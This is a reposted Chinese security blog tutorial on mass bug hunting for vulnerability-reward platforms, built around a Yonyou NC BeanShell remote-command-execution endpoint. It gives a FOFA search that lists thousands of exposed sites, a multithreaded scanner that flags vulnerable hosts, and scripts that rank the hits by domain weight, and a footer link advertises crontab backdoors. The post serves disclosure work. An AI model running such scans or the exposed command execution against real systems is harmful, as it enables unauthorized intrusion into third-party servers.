src漏洞的批量挖掘分享

admin 2022年7月8日18:37:17安全文章评论8 views8917字阅读29分43秒阅读模式

¶前言

本篇博文只谈漏洞的利用和批量挖掘。
在接触src之前,我和很多师傅都有同一个疑问,就是那些大师傅是怎么批量挖洞的?摸滚打爬了两个月之后,我渐渐有了点自己的理解和经验,所以打算分享出来和各位师傅交流,不足之处还望指正。

¶漏洞举例

这里以前几天爆出来的用友nc的命令执行漏洞为例

CODE

1
http://x.x.x.x/servlet//~ic/bsh.servlet.BshServlet


src漏洞的批量挖掘分享

文本框里可以命令执行


src漏洞的批量挖掘分享

¶漏洞的批量检测

在知道这个漏洞详情之后,我们需要根据漏洞的特征去fofa里寻找全国范围里使用这个系统的网站,比如用友nc在fofa的搜索特征就是

CODE

1
app="用友-UFIDA-NC"

src漏洞的批量挖掘分享

可以看到一共有9119条结果,接下来我们需要采集所有站点的地址下来,这里推荐狼组安全团队开发的fofa采集工具fofa-viewer

CODE

1
github地址:https://github.com/wgpsec/fofa_viewer

src漏洞的批量挖掘分享

然后导出所有站点到一个txt文件中
根据用友nc漏洞命令执行的特征,我们简单写一个多线程检测脚本

PYTHON

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/5/10 9:16
# blog: www.wlhhlc.top
import requests
import threadpool
import os

def exp(url):
poc = r"""/servlet//~ic/bsh.servlet.BshServlet"""
url = url + poc
try:
res = requests.get(url, timeout=3)
if "BeanShell" in res.text:
print("[*]存在漏洞的url:" + url)
with open ("用友命令执行列表.txt", 'a') as f:
f.write(url + "n")
except:
pass

def multithreading(funcname, params=[], filename="yongyou.txt", pools=10):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("n")] + params
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(funcname, works)
[pool.putRequest(req) for req in reqs]
pool.wait()

def main():
if os.path.exists("用友命令执行列表.txt"):
f = open("用友命令执行列表.txt", 'w')
f.truncate()
multithreading(exp, [], "yongyou.txt", 10)

if __name__ == '__main__':
main()

src漏洞的批量挖掘分享

运行完后得到所有漏洞站点的txt文件

src漏洞的批量挖掘分享

¶域名和权重的批量检测

在我们提交补天等漏洞平台时,不免注意到有这么一个规则,公益漏洞的提交需要满足站点的百度权重或者移动权重大于等于1,亦或者谷歌权重大于等于3的条件,补天漏洞平台以爱站的检测权重为准

CODE

1
https://rank.aizhan.com/

src漏洞的批量挖掘分享

首先我们需要对收集过来的漏洞列表做一个ip反查域名,来证明归属,我们用爬虫写一个批量ip反查域名脚本
这里用了ip138和爱站两个站点来进行ip反查域名
因为多线程会被ban,目前只采用了单线程

PYTHON

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/6/2 22:39
# blog: www.wlhhlc.top
import re, time
import requests
from fake_useragent import UserAgent
from tqdm import tqdm
import os
# ip138
def ip138_chaxun(ip, ua):
ip138_headers = {
'Host': 'site.ip138.com',
'User-Agent': ua.random,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://site.ip138.com/'}
ip138_url = 'https://site.ip138.com/' + str(ip) + '/'
try:
ip138_res = requests.get(url=ip138_url, headers=ip138_headers, timeout=2).text
if '<li>暂无结果</li>' not in ip138_res:
result_site = re.findall(r"""</span><a href="/(.*?)/" target="_blank">""", ip138_res)
return result_site
except:
pass

# 爱站
def aizhan_chaxun(ip, ua):
aizhan_headers = {
'Host': 'dns.aizhan.com',
'User-Agent': ua.random,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://dns.aizhan.com/'}
aizhan_url = 'https://dns.aizhan.com/' + str(ip) + '/'
try:
aizhan_r = requests.get(url=aizhan_url, headers=aizhan_headers, timeout=2).text
aizhan_nums = re.findall(r'''<span class="red">(.*?)</span>''', aizhan_r)
if int(aizhan_nums[0]) > 0:
aizhan_domains = re.findall(r'''rel="nofollow" target="_blank">(.*?)</a>''', aizhan_r)
return aizhan_domains
except:
pass


def catch_result(i):
ua_header = UserAgent()
i = i.strip()
try:
ip = i.split(':')[1].split('//')[1]
ip138_result = ip138_chaxun(ip, ua_header)
aizhan_result = aizhan_chaxun(ip, ua_header)
time.sleep(1)
if ((ip138_result != None and ip138_result!=[]) or aizhan_result != None ):
with open("ip反查结果.txt", 'a') as f:
result = "
:"
+ i + " " + "[ip138]:" + str(ip138_result) + " [aizhan]:" + str(aizhan_result)

print(result)
f.write(result + "n")
else:
with open("反查失败列表.txt", 'a') as f:
f.write(i + "n")
except:
pass

if __name__ == '__main__':
url_list = open("用友命令执行列表.txt", 'r').readlines()
url_len = len(open("用友命令执行列表.txt", 'r').readlines())
#每次启动时清空两个txt文件
if os.path.exists("反查失败列表.txt"):
f = open("反查失败列表.txt", 'w')
f.truncate()
if os.path.exists("ip反查结果.txt"):
f = open("ip反查结果.txt", 'w')
f.truncate()
for i in tqdm(url_list):
catch_result(i)

运行结果:

src漏洞的批量挖掘分享

然后拿到解析的域名后,就是对域名权重进行检测,这里采用爱站来进行权重检测,继续写一个批量检测脚本

PYTHON

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/6/2 23:39
# blog: www.wlhhlc.top
import re
import threadpool
import urllib.parse
import urllib.request
import ssl
from urllib.error import HTTPError
import time
import tldextract
from fake_useragent import UserAgent
import os
import requests
ssl._create_default_https_context = ssl._create_stdlib_context

bd_mb = []
gg = []
global flag
flag = 0

#数据清洗
def get_data():
url_list = open("ip反查结果.txt").readlines()
with open("domain.txt", 'w') as f:
for i in url_list:
i = i.strip()
res = i.split('[ip138]:')[1].split('[aizhan]')[0].split(",")[0].strip()
if res == 'None' or res == '[]':
res = i.split('[aizhan]:')[1].split(",")[0].strip()
if res != '[]':
res = re.sub('['[]]', '', res)
ext = tldextract.extract(res)
res1 = i.split('
:'
)[1].split('[ip138]')[0].strip()

res2 = "http://www." + '.'.join(ext[1:])
result = '
:'
+ res1 + 't' + '[domain]:' + res2

f.write(result + "n")

def getPc(domain):
ua_header = UserAgent()
headers = {
'Host': 'baidurank.aizhan.com',
'User-Agent': ua_header.random,
'Sec-Fetch-Dest': 'document',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Cookie': ''
}
aizhan_pc = 'https://baidurank.aizhan.com/api/br?domain={}&style=text'.format(domain)
try:
req = urllib.request.Request(aizhan_pc, headers=headers)
response = urllib.request.urlopen(req,timeout=10)
b = response.read()
a = b.decode("utf8")
result_pc = re.findall(re.compile(r'>(.*?)</a>'),a)
pc = result_pc[0]

except HTTPError as u:
time.sleep(3)
return getPc(domain)
return pc

def getMobile(domain):
ua_header = UserAgent()
headers = {
'Host': 'baidurank.aizhan.com',
'User-Agent': ua_header.random,
'Sec-Fetch-Dest': 'document',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Cookie': ''
}
aizhan_pc = 'https://baidurank.aizhan.com/api/mbr?domain={}&style=text'.format(domain)
try:
req = urllib.request.Request(aizhan_pc, headers=headers)
response = urllib.request.urlopen(req,timeout=10)
b = response.read()
a = b.decode("utf8")
result_m = re.findall(re.compile(r'>(.*?)</a>'),a)
mobile = result_m[0]
except HTTPError as u:
time.sleep(3)
return getMobile(domain)

return mobile
# 权重查询
def seo(domain, url):
try:
result_pc = getPc(domain)
result_mobile = getMobile(domain)
except Exception as u:
if flag == 0:
print('[!] 目标{}检测失败,已写入fail.txt等待重新检测'.format(url))
print(domain)
with open('fail.txt', 'a', encoding='utf-8') as o:
o.write(url + 'n')
else:
print('[!!]目标{}第二次检测失败'.format(url))
result = '[+] 百度权重:'+ result_pc +' 移动权重:'+ result_mobile +' '+url
print(result)
if result_pc =='0' and result_mobile =='0':
gg.append(result)
else:
bd_mb.append(result)

return True

def exp(url):
try:
main_domain = url.split('[domain]:')[1]
ext = tldextract.extract(main_domain)
domain = '.'.join(ext[1:])
rew = seo(domain, url)
except Exception as u:
pass

def multithreading(funcname, params=[], filename="domain.txt", pools=15):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("n")] + params
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(funcname, works)
[pool.putRequest(req) for req in reqs]
pool.wait()

def google_simple(url, j):
google_pc = "https://pr.aizhan.com/{}/".format(url)
bz = 0
http_or_find = 0
try:
response = requests.get(google_pc, timeout=10).text
http_or_find = 1
result_pc = re.findall(re.compile(r'<span>谷歌PR:</span><a>(.*?)/></a>'), response)[0]
result_num = result_pc.split('alt="')[1].split('"')[0].strip()
if int(result_num) > 0:
bz = 1
result = '[+] 谷歌权重:' + result_num + ' ' + j
return result, bz
except:
if(http_or_find !=0):
result = "[!]格式错误:" + "j"
return result, bz
else:
time.sleep(3)
return google_simple(url, j)

def exec_function():
if os.path.exists("fail.txt"):
f = open("fail.txt", 'w', encoding='utf-8')
f.truncate()
else:
f = open("fail.txt", 'w', encoding='utf-8')
multithreading(exp, [], "domain.txt", 15)
fail_url_list = open("fail.txt", 'r').readlines()
if len(fail_url_list) > 0:
print("*"*12 + "正在开始重新检测失败的url" + "*"*12)
global flag
flag = 1
multithreading(exp, [], "fail.txt", 15)
with open("权重列表.txt", 'w', encoding="utf-8") as f:
for i in bd_mb:
f.write(i + "n")
f.write("n")
f.write("-"*25 + "开始检测谷歌的权重" + "-"*25 + "n")
f.write("n")
print("*" * 12 + "正在开始检测谷歌的权重" + "*" * 12)
for j in gg:
main_domain = j.split('[domain]:')[1]
ext = tldextract.extract(main_domain)
domain = "www." + '.'.join(ext[1:])
google_result, bz = google_simple(domain, j)
time.sleep(1)
print(google_result)
if bz == 1:
f.write(google_result + "n")
print("检测完成,已保存txt在当前目录下")
def main():
get_data()
exec_function()

if __name__ == "__main__":
main()



src漏洞的批量挖掘分享

src漏洞的批量挖掘分享

src漏洞的批量挖掘分享

¶漏洞提交

最后就是一个个拿去提交漏洞了

src漏洞的批量挖掘分享

¶结尾

文中所写脚本还处于勉强能用的状态,后续会进行优化更改。师傅们如有需要也可选择自行更改。

作者:dota_st

原文地址:https://www.wlhhlc.top/posts/997/

渗透测试常用武器分享 第五期(SRC批量工具)

渗透测试常用武器分享 (信息收集)

渗透测试常用武器分享 第二期(泄露扫描)

linux-隐藏你的crontab后门

[] - BurpSuiteTips

 - 

linux+



原文始发于微信公众号(渗透测试教程):src漏洞的批量挖掘分享

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月8日18:37:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  src漏洞的批量挖掘分享 http://cn-sec.com/archives/1166444.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: